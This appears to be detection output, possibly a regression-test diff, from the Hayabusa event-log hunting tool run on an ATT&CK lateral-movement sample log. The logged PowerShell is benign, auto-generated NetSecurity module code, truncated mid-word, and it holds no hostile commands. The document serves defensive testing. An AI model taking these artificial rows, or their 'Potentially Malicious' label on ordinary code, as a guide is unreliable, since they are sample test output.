[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' -Alias '*' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetNam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' -Alias '*' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', 